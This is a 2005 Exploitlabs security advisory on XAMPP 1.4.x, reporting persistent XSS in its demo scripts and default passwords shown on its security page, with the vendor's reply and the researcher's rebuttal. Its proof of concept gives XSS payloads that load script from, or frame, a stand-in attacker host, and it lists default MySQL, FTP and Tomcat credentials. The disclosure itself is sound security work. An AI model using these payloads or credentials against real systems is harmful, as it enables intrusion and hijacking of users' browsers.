Exploit Labs Security Advisory 2005.6

`------------------------------------------------------------  
- EXPL-A-2005-006 exploitlabs.com Advisory 034 -  
------------------------------------------------------------  
- XAMPP -  
  
  
  
OVERVIEW  
========  
XAMPP is an easy to install Apache distribution containing MySQL,  
PHP and Perl. XAMPP is really very easy to install and to use  
- just download, extract and start  
  
http://www.apachefriends.org/en/xampp.html  
  
  
  
AFFECTED PRODUCTS  
=================  
Windows Version 1.4.X  
http://www.apachefriends.org/en/xampp-windows.html  
  
Linux 1.4.X ( all )  
http://www.apachefriends.org/en/xampp-linux.html  
  
Solaris 0.3 ( all )  
http://www.apachefriends.org/en/xampp-solaris.html  
  
  
  
DETAILS  
=======  
1.  
persistant XSS is present in user supplied input fields  
allowing attackers to render any javascript in the users browser.  
some javascript will break the application, disallowing further  
user input to the script.  
  
http://[host]/xampp/cds.php  
http://[host]/xampp/guestbook-en.pl ( linux )  
http://[host]/xampp/phonebook.php  
  
  
  
2.  
default / install usernames and passwords  
  
by viewing http://[host]/xampp/security.php XAMPP discloses  
usernames / passwords ( example below )  
  
  
Item 2a  
-------  
The phpMyAdmin user pma has no password UNSECURE  
phpMyAdmin saves your preferences in an extra MySQL database. To access  
this data  
phpMyAdmin uses the special user pma. This user has in the default  
installation no  
password set and to avoid any security problems you should give him a  
passwort.  
  
Item 2b  
-------  
The MySQL user root has no password UNSECURE  
Every local user on Linux box can access your MySQL database with  
administrator rights.  
You should set a password.  
  
Item 2c  
-------  
The FTP password for user nobody is still 'lampp' UNSECURE  
By using the default password for the FTP user nobody everyone can upload  
and change  
files for your XAMPP webserver. So if you enabled ProFTPD you should set a  
new password  
for user nobody.  
  
Item 2d  
-------  
Tomcat Admin/Config User for XAMPP:  
User: xampp  
Password: xampp  
  
  
  
PROOF OF CONCEPT  
=================  
  
Item 1a  
--------  
http://[host]/xampp/cds.php  
enter text...  
<script language=JavaScript src=http://evilattacker/js.js></script>  
  
stores values in the mysql database  
  
also 1c  
  
Item 1b  
--------  
http://[host]/xampp/guestbook-en.pl  
see 1c  
  
Item 1c  
--------  
http://[host]/xampp/phonebook.php  
enter into a input field...  
  
<iframe src=http://evilatacker></iframe>  
  
and when rendered forceably redirects the user to http;//evilattacker  
  
  
  
SOLUTION  
========  
none ( see vendor response )  
  
vendor response:  
----------------  
  
Dear Donnie!  
  
> you have a severly insecure package.  
> here are my raw notes.  
  
Thank you for your notes. But XAMPP is meant only for internal  
development usage and not on production systems.  
  
See http://www.apachefriends.org/en/xampp.html  
(section "The philosopy")  
  
The vulnerable scripts are only very simple demonstation programms to  
test the functions of Apache/MySQL/etc. and to give beginners first  
inspirations in programming.  
Also this scripts are not meant for public usage.  
  
But you may be right. We should make the warning messages about the  
dangers of use for our software bigger.  
  
  
researcher comment:  
-------------------  
  
a disclaimer of this type does not mitigate the security issues  
present in XAMPP. this package is targeted at beginners, the very  
users who need to be protected the most and taught secure by default.  
  
  
  
  
  
CREDITS  
=======  
This vulnerability was discovered and researched by  
Donnie Werner of Exploitlabs  
  
Donnie Werner  
Information Security Specialist  
[email protected]  
  
--   
web: http://exploitlabs.com  
http://exploitlabs.com/files/advisories/EXPL-A-2005-006-xampp.txt  
`